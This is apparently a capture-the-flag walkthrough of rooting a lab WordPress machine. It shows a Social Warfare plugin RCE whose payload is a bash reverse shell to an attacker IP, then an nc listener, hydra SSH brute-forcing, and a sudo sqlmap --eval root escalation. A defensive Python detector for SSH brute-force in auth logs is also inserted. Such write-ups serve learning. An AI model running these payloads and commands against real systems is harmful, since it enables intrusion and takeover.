Web foothold
The target turned out to be WordPress; clicking around a bit redirected to http://new.dsz
Added a hosts entry for it.
With WordPress the usual routine applies: run wpscan to enumerate users and brute-force passwords first, but that turned up nothing.
Found that the site uses the Social Warfare v3.5.2 plugin; a quick search turns up an RCE for it: https://github.com/hash3liZer/CVE-2019-9978
┌──(root㉿kali)-[~]
└─# cat payload
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$
Shell obtained.
Privilege escalation
www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$
Under /opt there is an executable, andeli_cred; running it prints a pile of MD5-looking values. Try using these strings to brute-force the andeli user's password.
┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1 ssh://192.168.1.36 -vV -f -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36 login: andeli password: 9eeb22195b4eb7a35bcad0f45761eb7b
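From the defender's side, the hydra run above leaves an obvious trace in sshd's auth log: a burst of failed password attempts for one account from one source, followed by a success. The following detector is an added example, not part of the original writeup; it parses constructed auth.log lines (the hostname, PIDs, ports and timestamps are invented) and flags a successful login that is preceded by a threshold of failures from the same source within a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the original post) mirroring a
# hydra run against one account: many failures from one source, then a success,
# plus an unrelated login from another source that should not be flagged.
SAMPLE_AUTH_LOG = """\
Jul  1 20:26:03 New sshd[1201]: Failed password for andeli from 192.168.1.37 port 50211 ssh2
Jul  1 20:26:03 New sshd[1202]: Failed password for andeli from 192.168.1.37 port 50212 ssh2
Jul  1 20:26:04 New sshd[1203]: Failed password for andeli from 192.168.1.37 port 50213 ssh2
Jul  1 20:26:04 New sshd[1204]: Failed password for andeli from 192.168.1.37 port 50214 ssh2
Jul  1 20:26:05 New sshd[1205]: Failed password for andeli from 192.168.1.37 port 50215 ssh2
Jul  1 20:26:05 New sshd[1206]: Failed password for andeli from 192.168.1.37 port 50216 ssh2
Jul  1 20:26:07 New sshd[1207]: Accepted password for andeli from 192.168.1.37 port 50217 ssh2
Jul  1 20:30:00 New sshd[1300]: Failed password for andeli from 10.0.0.5 port 40001 ssh2
Jul  1 20:30:30 New sshd[1301]: Accepted password for andeli from 10.0.0.5 port 40002 ssh2
"""

# OpenSSH "Failed/Accepted password for [invalid user] USER from IP port N ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_ts(ts, year=2025):
    # syslog timestamps carry no year; assume one so time deltas can be computed
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return (user, src, failures) for every successful login that was
    preceded by >= threshold failures from the same source within window_s."""
    failures = defaultdict(list)   # (user, src) -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["user"], m["src"])
        t = parse_ts(m["ts"])
        # keep only failures that are still inside the sliding window
        failures[key] = [f for f in failures[key] if (t - f).total_seconds() <= window_s]
        if m["result"] == "Failed":
            failures[key].append(t)
        elif len(failures[key]) >= threshold:
            alerts.append((m["user"], m["src"], len(failures[key])))
            failures[key].clear()
    return alerts

if __name__ == "__main__":
    for user, src, n in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"ALERT: {user} from {src} logged in after {n} failed attempts")
```

On a real host the same function can be fed the contents of /var/log/auth.log; tightening the threshold or widening the window trades false positives against slower, spread-out guessing.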
Log in over SSH and go through the standard three checks. Looking for SUID binaries turns up nothing exploitable.
Check sudo -l:
andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User andeli may run the following commands on New:
(ALL) NOPASSWD: /usr/bin/sqlmap
sqlmap can be run as root.
andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
___
__H__
___ ___[)]_____ ___ ___ {1.5.2#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:43:51 /2025-07-01/
[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
#